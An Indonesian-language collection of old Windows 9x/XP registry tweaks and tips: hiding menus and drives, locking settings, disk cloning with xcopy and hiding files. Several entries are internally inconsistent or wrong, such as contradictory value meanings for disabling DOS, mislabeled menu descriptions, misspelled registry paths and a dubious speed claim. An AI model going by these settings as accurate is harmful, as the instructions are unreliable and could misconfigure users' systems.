Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies ----> Jika ingin menyembunyikan di seluruh login .
Data Type: Dword
Value Name : NoStartMenuMorePrograms
data : 1
Trik ini hanya dapat bekerja pada style windows XP standar bukan Klasik

Mengirim pesan lewat jaringan win XP & Win 98

Tujuan : Mengirim pesan lewat jaringan win XP & Win 98 .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan winpopup.
Klik Icon Amplop pilih users and komputer dan pilih nama komputer untuk
mengirim pesan kesatu komputer saja. Sedang untuk mengirim ke workgroup pilih
workgroup. ( untuk pengguna windows 98 )
Untuk pengguna win XP dan win 2000 gunakan command line Net Send
pada command prompt. Net Send [name | * | \Domain] \Users [message]
Contoh : Net Send/Domain : Linux hai apa khabar --> mengirim pesan
hai apa khabar keseluruh komputer dalam domain linux.
* Net send comp01 sampai berjumpa lagi mengirim pesan sampai berjumpa lagi ke
komputer yang memiliki host name comp01.
Untun Win 98 agar winpopup selalu on line kliklah message-->options dan cek always on top

Mengubah kata Play in Winamp

Tujuan : Mengubah kata Play in Winamp.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_Clases_root\Winamp.File\Shell\Play\
pada value name [default] klik dan pilih modify akan muncul
&play in winamp ubah lah kalimat tersebut terserah anda
misal &main disini.
Lakukan lah hal yang sama di
Key: HKEY_Clases_root\Winamp.Playlist\Shell\Play\

Minimize Outlook XP/2002 ke System Tray

Tujuan : Meminimize tampilan Outlook ke system Tray (dekat tampilan jam pada system tray .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit / regedt32.exe lalu tekan Enter.
Key: HKEY_Current_Users\Software\Microsoft\office\10.0\Outlook\Preferences
Data Type: Dword
Value Name : MinToTray
data : 1

Ukuran Icon Toolbar terkecil pada Explorer

Tujuan : Memperkecil ukuran toolbar pada destop .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit / regedt32.exe lalu tekan Enter.
Key: HKEY_Current_Users\Software\Microsoft\windows\CurrentVersion\Explorer
Sub Key baru :SmallIcons
Data Type: String
Value Name : SmallIcons
data : Yes

Menghapus page file saat Shutdown

Tujuan : Menghapus page file saat shutdown untuk mempecepat kinerja windows .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit / regedt32.exe lalu tekan Enter.
Key: HKEY_Local_Machine\system\CurrentControlSet\Control\session\Manager\Memory\Management
Data Type: Reg Dword
Value Name : ClearPageFileAtshutdown
data : 1

Setting Asyik Untuk Compresed Drive

Tujuan : Meng-Amount partisi pada hardisk secara otomatis saat compres drive .
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit / regedt32.exe lalu tekan Enter.
Key: HKEY_Local_Machine\system\CurrentControlSet\Control\Filesystem
Data Type: String
Value Name : AutoMountDrives
data : 1

Memanggil aplikasi dengan nama berbeda

Tujuan : Memanggil program aplikasi dengan lebih cepat
Ikutilah langkah berikut :
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_Local_Machine\software\Microsoft\Windows\CurrentVersion\App Paths
Buat sub key baru ---> winword.exe, Klik ganda data string yang bernama (Default)
dan isi nilainya dengan file aplikasi tersebut misal : C:\ProgramsFiles\Msoffice\
Winword\winword.exe

Kloning Harddisk Dengan XCOPY

1. Instal Os Windows Dan Program aplikasinya yang hendak dikloning
2. Pasang Hardisk Sumber "Master" dan Duplicat "Slave"
3. Jalankan komputer anda dan masuk Ke Dos Prompt
4. Format Hardisk : Format d:/u atau Format d:/q/u
5. Setelah Format selesai keluarlah dari direktori windows dengan mengetik CD..
6. Kloning hardisk anda perintah Xcopy/h/e/r/y/s/c/k c:d:
7. Matikan komputer anda dan coba Booting dari hardisk Slave Pasti Hasilnya sama
dengan hardisk Master

Taskbar sebagai Penyimpan Shortcut di Desktop

Tujuan : Untuk Memperindah tampilan desktop dari tampilan Shortcut yang begitu
banyak
Caranya :
1. Buat Direktori baru misal MyShortcut dan masukkan shortcut-shortcut yang ada
di direktory desktop kedalam direktory tersebut.
2. Klik kanan Taskbar dan hilangkan centang pada pilihan Lock The Taskbar.
3. Klik kanan lagi di taskbar dan pilih Toolbar-->New toolbar.
4. Didalam kotak dialog Newtoolbars, pilih direktory yang telah kita isi dengan
kumpulan shortcut.
5. Setelah itu di taskbar akan muncul toolbars baru dengan nama sama seperti direktory
yang kita buat . kemudian drag toolbar tersebut dengan menahan klik kanan dan mengeserya
kepingir layar desktop.
6. Jika kita ingin menghilangkan sementara toolbar yang baru kita buat klik kanan pada
taskbar tersebut dan pilih Auto-Hide dan akan muncul kembali apabila anda
mendekatkan kursor mouse ke dekat sisi desktop tempat taskbar tsb berada.

Memperbaiki Folder Temporary internet Files

Tujuan : Memperbaiki folder temporery internet file di C: Windows
Kerusakan ini dapat diperbaiki dengan progran tweakui
anda dapat menggunakan menu yang terdapat pada tab repair. Jika anda tak memiliki
anda dapat menggunakan system registry.
Ikutilah langkah berikut :
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_Local_Machine\software\Microsoft\Windows\CurrentVersion\IntenetSettings
\Cache\Paths
Disana anda akan menemukan data string yang bernama Direktory klik ganda data
tersebut dan ganti nilainya dengan C:windows\temporary internet Files\content.IE5
untuk window 9x atau C:\Documents and settings\\local Settings\Temporary
Internet Files\Content.IE5 Untuk windows XP dan restat pc anda.

Mengganti Tampilan Boot Loader

Tujuan : Menganti tampilan boot loader dari tampilan Devault. Boot Loader=Tampilan awal
waktu booting komputer dengan dua system Operating.
Cara :
1. Klik kanan pada My Komputer.
2. Pilih Propertis
3. Pilih Tab Advanced
4. Tekan tombol Setting pada Starup and recovery.
5. Pada Devault operating system pilih jendela apa yang akan di sorot atau dipilih pada
saat boot loader tampil.
6. Time To display list of operating system adalah waktu untuk menampilkan boot loader
7. Untuk mengganti nama yang tampil pada bootloader, tekan tombol edit
8. Anda akan masuk pada Aplikasi Notepad yang isinya adalah sebagai berikut
[boot loader]
timeout=5
default=c:\
[operating systems]
c:\="Microsoft windows ME (memang enak)"multi(0)disk(0)rdisk(0)partition(2)\windows
="Microsoft Windows Xp-Rimen" /fastdetect
9. pada tampilan script diatas, di jelaskan bahwa windows me adalah default operating system
pada boot loader. Pada tampilan ini anda bisa mengubah kata kata yang ada di dalam tanda petik.
10. Jangan lupa untuk menyimpan file yang telah anda ganti tersebut dengan memilih File>Save

Menjaga Windows Tetap sehat

Tujuan : mengantisipasi kerusakan kerusakan windows akibat konfigurasi yang tidak benar
Gejala gejala dari hal diatas adalah : windows sangan lamban , sering restat dan lain lain.
Untuk Mengantisipasi hal diatas ikutilah langkah berikut :
1. Bersihkan File Dan folder yang sudah tidak diperlukan lagi. Anda juga bisa menggunakan bantuan
program Disk Cleanup yang merupakan utility windows.Untuk membukanya anda dapat klik
Strat ->Programs-> Accessories ->System Tool-> Disk Cleanup atau pada kotak dialog Run
ketik cleanmgr
2. Scan dan pastikan hardisk anda terbebas dari virus
3. Backup Registry windows anda cara : ketik regedit pada kotak dilaog Run pilih
menu Registry-> Export Registri File. Untuk Meload registry lama anda dapat menggunakan
menu Registry-> Import Registry File.
4. Gunakan Norton win Doctor Pada Program norton Utilyty. Untuk memperbaiki kesalahan pada sistem
operasi
5. Gunakan Norton Optimization Wizard pada program norton utylity untuk mempercepat kinerja
komputer
6. Optimalkan registry anda ketikkan scanreg /opt pada koatak dialog run
7. Lakukan Scandisk pada semua drive untuk memperbaiki jika ada file system yang erros
Start-> Programs-> Accessories-> System Tools->Scandisk. anda juga bias menggunakan Norton
Disk Doctor pada program Norton Utilyty.
8. Lakukan Defragmentasi pada semua Drive. Start-> Programs-> Accessories-> System Tools->Disk Defragmenter
atau Norton Speed Disk Pada program norton Utilyty.
9. Langkah Yang paling ampuh dan final dengan menjalankan Program Norton System Chek pada
program Norton Utilyty

Menonaktifkan Tombol Windows di Keyboard

Tujuan : Menonaktifkan tombol windows pada keyboard sehingga users tidak bisa menggunakan
tombol tersebut.
LAngkah : Klik Start --> Run --> Regedit
Key : HKEY_Local_machine\system\CurrentControlSet\Control\Keyboard Layout
Data Type : New--> Binary value
Vakue Name : Scancode Map
Data : 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00.
Kemudian Restat PC anda.

Menghilangkan MY Komputer dari Destop Dan Start Menu

Tujuan : Menyembunyikan Icon My Komputer Sehingga Users tidak dapat akses ke Icon Tsb.
Langkah : Klik Start --> Run --> Regedit
Key : HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Policies\NonEnum
Klik : Edit-->New-->Dword VAlue
Beri nama DWORD Value baru tersebut dengan nama {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Isikan value datanya dengan nilai 1
restat pc anda.
Yang perlu diingat Trik ini hanya berjalan pada Windows Me,2000,dan Windows XP

Mendisabled Splas Screen pada Outlook Express.

Langkah : Ketik Regedit Pada Strat Menu
KEY : Hkey_Current_User\Software\Microsoft\Outlook Express.
Data Type : Dword
Value Name : NoSplash.
Data : 1
Lalu lakukan hal yang sama pada key : Hkey_Current_User\Identities\{CBE5A5A0-
18F8-11D7-B853-A13BA0B81D26}\Software\Microsoft\Outlook Express\5.0
(sesuaikan dengan versi outlook expres anda )

Menghilangkan Advanced Tab Pada Internet Options

LAngkah : Ketik Regedit Pada Strat Menu
Key : Hkey_Current_User\Software\policies\Microsoft\internet Explorer\Control Panel.
Data Type : Dword
Value Name: Advanced Tab
Data : 1
Kita juga dapat menghilangkan tab tab lain pada pada internet option seperti GEneral,
Security, Content dan lain sebagainya caranya sama diatas pada value name nama tab yang
yang ingin dihilangkan di sambung kata tab, misal GeneralTab,SecurityTab, dan sebagainya

Mendisable Penggantian HomePage

Tujuan : agar user tidak bisa mengganti HomePage vavorite kita yang terdapat pada internet
option
Langkah : Ketik Regedit pada Strat Menu
Key : HkeyCurrent_User\Software\policies\microsoft\internet explorer\Control Panel
Data Type : Dword
Value Name: Homepage
Data : 1
Anda juga dapat langsung mengganti home page ini melalui key
Hkey_Current_User\Software\Microsoft\internet Explorer\Main. disana anda kan menemukan data
string bernama star page. klik ganda data tersebut dan isilah dengan nama alamat yang anda
sukai.

Mengubah Fasilitas Undo Histori Pada Excel 2000

Tujuan : mengubah fasilatas undo history pada excel 2000 sebanyak yang kita inginkan
Langkah : Klik Start --> Run --> REgedit
Key : Hkey_Current_User\Software\Microsoft\Office\9.0\Excel\Options.
Data Type : Dword
Value Name : UndoHistory
Data : 25 ( terserah anda )

Menonaktifkan Fitur File and Print Sharing

Tujuan : Memproteksi file and Print Sharing
Langkah : Klik Start --> Run --> Regedit
Key : Hkey_Current_user\Software\Microsoft\Windows\CurrentVersion\Policies\
Network.
Data Type : Dword
Value Name : NoFileSharing
Data : 1
Data Type : Dword
Value Name : NoPrintSharing
Data : 1

Mengaktifkan kembali Registri Editor yang telah di Disable

langkah :
1. jalankan Notepade lalu ketikkan perintah berikut
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000
2. Simpan file tersebut dengan nama *.reg
3. Jalankan file trsebut dengan menekan enter
4. jika mengalami kegagalan jalankan melalui dos ( akan dibahas lebih lanjut )

Membuat " Welcome Sound " berbeda setiap hari

langkah :
1. Buat folder baru c:windows\Sound. Letakkan semua file *.wav yang akan digunakan secara
bergantian. Rename nama masing masing menjadi misal : sound01.wav , sound02.wav
dst
2. Buka control panel klik ganda icon sound. pilih start windows pada daftar
even, kilk brows pilih suara yang akan digunakan pertama kali misal tr.
klik ok.
3. Buka notepad dan buat batch file dengan isi sebagai berikut :
cd c:\windows\sound
ren sound01.wav soundxx.wav
ren sound02.wav sound01.wav
ren sound03.wav sound02.wav
ren soundxx.wav sound03.wav
copy sound01.wav c:\windows\media\Start.wav
jika anda memiliki lebih dari 3 macam sound yang akan digilir, anda dapat
menambah baris command pada batch file yang telah anda buat, simpan misal
dengan nama ganti.bat dan letakkan pada folder c:\windows, tambahkan baris
command pada file autoexec.bat c;\windows\ganti.bat.
oke selasai dan anda siap untuk mencoba

Meningkatkan kwalitas warna icon di windows

langkah :
1. Masuk registry editor dengan ketik regedit
2. Masuk Hkey_Current_user\control\panel\desktop\windowsMetrics.
3. carilah string valuae dengan nama Shell Icon BPP
4. Ubahlah color datanya sesuai dengan color Depthmaksimal yang didukung oleh grafik
card anda, jadi kalau 32 bit maka isi value data dengan max 32, dan jika 24 bit isi
max 24.
5. Tutup registry editor dan restat pc anda

Membuat Shortcut folder favorite pada klik kanan My Komputer

Contoh kita akan membuat shortcut untuk folder Temp yang berada dalam folder windows.
Langkah :
1. Jalankan registry editor
2. Masuk ke key HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AE2-1069-A2D8-08002B30309D}\shell.
3. Buat sub key baru dengan nama Folder temp, atau sesuka anda
4. pada panel sebelah kanan sub key tersebut. klik ganda string value [Default],
isi nilai datanya dengan nilai terserah anda misal Buka folder temp . value data dari string
value [Default] inilah yang akan muncul ketika anda mengklik kanan icon my komputer. tetapi
jika kita tidak mengisikannya yang muncul adalah subkey tadi , yaitu foder temp.
5. didalam subkey folder temp buat subkey baru dengan nama command.
6. pada sebelah kanan subkey tersebut klik ganda string value [Default]dan isikan
c:\windows\explorer.exe c:\windows\temp
7. selesai dan anda boleh coba jika suka

Mengatur tingkat prioritas suatu aplikasi (win XP)

Tujuan : lebih mendahulukan satu aplikasi dari beberapa aplikasi yang bekerja secara bersamaan.
Langkah :
1. Klik kanan mouse pada taskbar , kemidian pilih [Task Manager] atau tekan ctrl_ALT_DEL pada
Keyboard.
2. Pada tab [Aplication], pilih aplikasi yang ingin anda ubah prioritasnya, kemudian klik kanan
mouse dan pilih [go to process] .
3. Task Manager akan memindah tab ke [Process] dan file program anda yang sedang di eksekusi akan
di sorot .
4. Klik kanan pada bagian tersebut.
5. Kemudian sorot [Set Priority]. Disana akan muncul pilihan [RealTime], [AboveNormal] ,[Normal]
[Below Normal] , dan [Low]. Anda dapat mengatur dengan sesuai keinginan anda. Aplikasi yang
membutuhkan prioritas tinggi seperti program multi media dapat di ubah ke [Above Normal] dan
yang tidak membutuhkan prioritas tinggi dapat diubah ke [Below Normal].
Untuk Mendapatkan hasil yang maksimal , anda harus mengatur prioritas sebijak mungkin agar program
yang prioritasnya lebih rendah tetap dapat bekerja dengan baik.

Siapa saja yang terhubung ke komputer anda ? ( Win Xp)

Langlah :
1. Klik [Strat] > [COntrol Panel] >[Performance and Maintenance] > [Administrative Tools].
2. Klik dua kali [Computer Management].
3. Begitu Windows Computer Manangemant terbuka , masuklah ke Computer Manangement(Local)
\System Tools\Open File\.
4. Pada bagian kanan windows akan nampak nama file yang sedang dibuka, nama pengaksesnya
beserta beberapa informasi lain .
5. Jika anda menemukan seseorang yang sedang mengakses file yang bukan haknya, klik kanan
mouse pada nama file tersebut, lalu pilih [Disconnect].
Untuk memutuskan semua koneksi anda tidak perlu repot repot cukup klik kanan mouse pada
bagian kosong di windows tersebut kemudian pilih [ Disconnet all open files] melaui menu bar

Memunculkan nama anda pada title bar windows media player

langkah :
1. Jalankan Registry editor anda
2. Masuk ke Key
HKEY_CURRENT_USERS\Sofware\Policies\Microsoft\WindowsMediaPlayer.
3. Buat String value baru dengan cara klik kanan pada panel sebelah kanan , dan pilih [New]
[String Value] .
4. Berikan nama string value tersebut dan isikan value data nya dengan nama anda.
5. Tutup Registry editor anda.
Untuk mengembalikan title bar tersebut menjadi tulisan semula , cukup hapus string
value yang baru kita buat tadi.

Menghilangkan icon icon pada control panel

cara 1.
1. Pindahkan file *.cpl di c:windows\system ke direktory lain
cara 2.
1. Cari file Control Ini yang ada didirektory windows\system, klik dua kali file tersebut
dan cari kata don't load dan tambahkan nama file *.cpl tadi yang iconnya mau dihilangkan
misal icon modem akan di hilangkan tambahkan
modem.cpl=no
2. dari asumsi diatas kita juga dapat membuat shortcut untuk masuk kesuatu icon dengan lebih cepat
misal ingin membuka tab display pada control panel dan ingin langsung masuk ke tab Screen saver
kita dapat membuat shroctcutnya [new] --> [Shortcut] --> pada bagian location isikan
" CONTROL DESK.CPL,,1". angka 1 menunjukkan urutan nomor tab anda dapat mengubahnnya
sesuai selera anda

Menciutkan Start Menu pada windows 9x/Me

Langkah :
1. Klik Star Run Regedit
2. Masuk pada Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer
3. Klik pada jendela kanan [New] --> [DWORD Value].
4. Beri nama sesuai tabel di bawah ini dan perhatikan besar kecilnya huruf, dan sesuaikan
dengan menu yang akan di hilangkan
5. Klik dua kali pada value tersebut isikan value datanya dengan angka 1 untuk aktifkan dan
angka 0 untuk matikan

START MENU VALUE
================================================================
Shutdown NoClose
Run NoRun
Log Off NoLogOff
Help NoSMHelp
Search / find NoFind
Documents NoRecentDocsMenu
Faforite NoFavoritesMenu
My Picture NoSMMyPictures
My Document NoSMMyDocs
Control Panel NoControlPanel
Printer NoPrinterTabs
Network Neighborhood NoNetHood
Taskbar & start menu NoSetTaskbar
Setting Folder Option NoFolderOptions
Windows Update NoWindowsUpdate
Mematikan fungsi recent docs NoRecentDocsHistory
Menghindari penggantian start menu NoChangeStartMenu
Menghilangkan file menu NoFileMenu
Membersihkan recent doc saat keluar
dari windows ClearRecentDocsOnExit

Hilangkan Drive Pada Komputer

Hal ini dapat dilakukan dengan maksud orang lain tidak bisa akses data komputer anda Ikutilah langkah berikut.
Klik Start----->Run, ketikkan regedit lalu tekan Enter.
Anda bisa menyembunyikan drive pada My Computer dengan cara masuk ke :
Key :HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\Explorer
Value Name : NoDrives
Data Type : REG_DWORD
Data :
Pada data bisa Anda isi dengan drive yang ingin Anda sembunyikan. Adapun nilainya adalah :
A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096,
N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152,
W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863

Disable DOS

Setting berikut ini akan mencegah "penggunaan" MS-DOS command prompt pada Windows.
Ikutilah langkah berikut.
Klik Start------->Run, ketikkan regedit lalu tekan Enter.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Policies\WinOldApp
Value Name: Disabled
Data Type: REG_DWORD Data: (0 = disable, 1 = enable/mencegah MS-Dos command prompt)

Hilangkan Icon Network Neigborhood

Icon Network Neigborhood akan nampak pada desktop jika Anda menginstall Windows Networking. Jika
Anda tidak suka, Anda bisa menyembunyikan icon tersebut.
Ikutilah langkah berikut.
Klik Start------>Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Policies\Explorer
Value Name: NoNetHood
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/menyembunyikan icon)

Hilangkan Desktop

Setting berikut akan menyembunyikan semua item yang terdapat pada desktop Anda.
Ikutilah langkah berikut.
Klik Start------->Run, ketikkan regedit lalu tekan Enter.
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\\
CurrentVersionPolicies\Explorer
Value Name : NoDesktop
Data Type : REG_DWORD
Data : (0 = disabled, 1 = enabled)

Hilangkan Panah Shortcut

Kalau kita membuat shortcut dari suatu aplikasi atau pun directory pasti akan kita lihat sebuah
panah kecil. Dari segi penampilan, panah yang menutupi sebagian icon tersebut sangat
menjengkelkan. Apalagi jika kita ingin menonjolkan gambar icon tersebut. Untuk itu ada sebuah
cara untuk menghapus panah tersebut sehingga penampilan icon kita lebih menarik.
Ikutilah langkah berikut.
Klik Start------->Run, ketikkan regedit lalu tekan Enter.
hapus string value "IsShortcut" yang ada di dalam subkey "lnkfile" dan "piffile" pada key
"HKEY_CLASSES_ROOT" dari registry windows anda.

Mencegah penggantian setting Display Properties

Anda dapat melakukan Setting display dari Control Panel - Display atau melalui klik kanan pada desktop, lalu pilih Properties.
Dengan setting di bawah ini orang lain tidak dapat mengganti setting pada Display tersebut.
Ikutilah langkah berikut.
Klik Start-------->Run, ketikkan regedit lalu tekan Enter.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDispCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/mencegah penggantian)

Menyimpan isi folder

Anda yang sering mengamati isi dari suatu folder, tentunya butuh cara yang tepat dan cepat. Untuk itu ikuti langkah berikut :
Pertama buat file isifolder.bat dengan Notepad dan diletakkan di c:\windows, lalu ketikkan :
@echo off
dir %1% /o > c:\windows\isifolder.txt notepad c:\windows\isifolder.txt
Buka registry lalu ke key [HKEY_CLASSES_ROOT\Directory\Shell
Buat key baru dg mengklik kanan pilih New - Key.
Pindah ke panel sebelah kanan, klik 2x pada Default.
Isi dengan &Lihat Isi Folder Buat key lagi dengan nama command.
Pd panel sebelah kanan klik 2x pd Default. Isi dengan c:\windows\isifolder.bat %1
Mulai sekarang untuk melihat dan menyimpan isi dari suatu folder, Anda tinggal mengklik kanan pada folder tersebut.

Mencegah perubahan setting Printer

Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel - Printer.
Ikutilah langkah berikut.
Klik Start----->Run, ketikkan regedit lalu tekan Enter.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoPrinters
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Mencegah perubahan setting Password

Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel - Password. Dengan kata lain orang lain tidak dapat mengganti password (jika komputer Anda memakai password Windows).
Ikutilah langkah berikut.
Klik Start------>Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoSecCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Mencegah perintah Shut Down

Setting berikut akan mencegah seseorang untuk mematikan komputer Anda. Hal ini berguna jika misalnya Anda meninggalkan komputer untuk beberapa saat dan Anda khawatir ada orang lain yang akan men-Shut Down komputer Anda.
Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoClose
Data Type : REG_DWORD
Data: (0 = shutdown enabled, 1 = shutdown disabled)

Menghilangkan Taskbar pada menu Setting

Jika Anda meng-enable setting di bawah ini maka tidak akan muncul menu Taskbar pada Start Menu, Tab Setting .Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer]
Value Name: NosetTaskbar
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Menampilkan Pesan saat Boting windows

Jika Anda meng-enable setting di bawah ini maka akan muncul pesan dimonitor saat Botting windows .Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Winlogon Clik Kanan Ã New Ã String Value
Value Name: LegalNoticeCaption â€œ Tulis Komentar anda â€œ

Value name : LegalNoticeText â€œ Tulis Komentar anda â€œ

Perataan teks pada Drop Down Menu

Drop down menu = menu yg muncul saat Anda mengklik menu File, Edit, Help, dll pd berbagai aplikasi Windows
Secara default, alignment pada drop down menu adalah rata kiri. Kalau Anda suka, Anda bisa menggantinya menjadi rata kanan. Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Caranya :
Key: HKEY_CURRENT_USER\Control Panel\Desktop
Value Name: MenuDropAlignment
Data Type: REG_SZ
Data: (0 = rata kiri, 1 = rata kanan)

Lanhkah I
Untuk menginstall font biasanya kita harus mengikuti langkah yang panjang : Start > Settings > Control Panel > Font. Lalu dari situ Anda harus klik File > Install New Fonts. Cara tersebut tentunya sangat menjengkelkan. Sebenarnya ada cara yang lebih mudah, yaitu :
1. Buka registry editor.
2. Pindah ke key "HKEY_CLASSES_ROOT\TTFFILE\SHELL".
3. Pilihlah perintah "Edit ---> New---> Key" dan berikanlah nama "Install Fonts" pada key yang baru diletakkan tadi.
4. Klik ganda pada bagian jendela kanan pada entry "(Default)".
5. Berikan nilai "Value"-nya "Install Font" dan konfirmasikan perubahan ini dengan mengklik "OK"
6. Tandai sekali lagi subkey "Install Font" dan di dalamnya dengan menggunakan perintah "Edit > New > Key".
7. Buatlah sebuah subkey baru yang dinamakan "command".
8. Klik ganda pada "(Default)", berikan pada "Value"-nya perintah "c:\windows\command\xcopy32.exe %1 c:\windows\fonts".

Langkah Ke II
Sekarang jika Anda mengklik kanan pada file *.ttf akan muncul menu Install Fonts. Jika anda memilih menu ini, maka file font tersebut akan di-copy ke dalam folder Windows anda.
Cara kedua :
1. Buat shortcut yang menunjuk ke directory font pada Windows Anda (C:\Windows\Fonts).
2. Letakkan shortcut tersebut pada directory Send To.
Sekarang untuk menginstall font, klik kanan pada file *.ttf, pilih Send To > Fonts.

Disable klik kanan pada Taskbar

Jika Anda meng-enable setting di bawah ini maka tidak akan muncul menu waktu melakukan klik kanan pada Start Menu, Tab control, dan Clock.Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer]
Value Name: NoTrayContextMenu
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Menyembunyikan menu Folder Options

Jika Anda meng-enable setting ini maka menu Folder Options yang terdapat pada Start Menu - Setting akan hilang.
Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoFolderOptions
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menyembunyikan Menu Control Panel

Jika Anda meng-enable setting ini maka menu Taskbar yang terdapat pada Setting pada Start Menu akan hilang.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoControlPanel
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)

Menyembunyikan menu Find

Jika Anda meng-enable setting berikut, maka Find yang terdapat pada Start Menu akan hilang.
Ikutilah langkah berikut.
Klik Start---->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\Explorer
Value Name: NoFind
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled)

Menyembunyikan menu Document

Setting berikut akan menyembunyikan folder atau menu Document yang terdapat pada Start Menu.
Ikutilah langkah berikut.
Klik Start*Run, ketikkan regedit lalu tekan Enter.
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name : NoRecentDocsMenu
Data Type : REG_DWORD
Data: (0=disable, 1=enable)

Menyembunyikan menu Run

Setting berikut akan menyembunyikan folder Document yang terdapat pada Start Menu. Ikutilah langkah berikut.
Klik Start--->Run, ketikkan regedit lalu tekan Enter.
Key :HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name : NoRun
Data Type : REG_DWORD
Data: (0=disable, 1=enable)

Menyembunyikan menu Help

Setting berikut akan menyembunyikan folder Document yang terdapat pada Start Menu. Ikutilah langkah berikut.
Klik Start--->Run, ketikkan regedit lalu tekan Enter.
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name : NoSMHelp
Data Type : REG_DWORD
Data: (0=disable, 1=enable)

Menghilangkan Start Banner

Jika Anda meng-enable setting ini maka panah dan tulisan Click here to start akan hilang (tulisan muncul pada saat masuk windows). Ikutilah langkah berikut.
Klik Start--->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoStartBanner
Data Type: REG_BINARY
Data: (00 00 00 00 = disabled, 01 00 00 00 = enabled)

Menambah menu Explore From Here

Setelah Anda mengganti dengan nilai di bawah ini maka saat Anda mengklik kanan pada folder akan muncul menu Explore From Here. Ikutilah langkah berikut.
Klik Start--->Run, ketikkan regedit lalu tekan Enter.
Key :HKEY_CLASSES_ROOT\*\shell\rootexplore.
(Anda harus membuatnya jika key tersebut belum ada)
Lalu editlah nilai "(Default)" dengan "E&xplore From Here". Pada rootexplore buatlah sebuah key baru dan beri nama dengan command. Edit "(Default)" dan beri nilai/nama "explorer.exe /e,/root,/idlist,%i".

Memproteksi file

Protect file atau folder dengan cara nge-rename file atau folder hal tersebut dengan menggunakankombinasi angka antara Alt+ angka pada keyped .Misal Alt+0160 ada kelemahannya yaitu file tersebut masih bisa dilihat di lingkungan windows 9x sebagai " " yang akan membuat orang yang melihat penasaran atawa ingin tahu.

Hidden File

Agar tidak dapat dilihat atau berupa hidden file caranya rubah nama
filenya ( misal nama filenya adalah Rajausil maka dari DOS ketikkan : "ren rajausil (Alt+0160) baru ganti attributnya dengan hidden dari DOS (bukan windows). Untuk membuka kembali atau menembusnya dengan mudah dapat digunakan Norton Commander ..... yaitu bila sudah masuk ke NC tekan tombol F6 dan ganti nama file yang katanya nggak kelihatan tadi.

Memproteksi folder dengan password

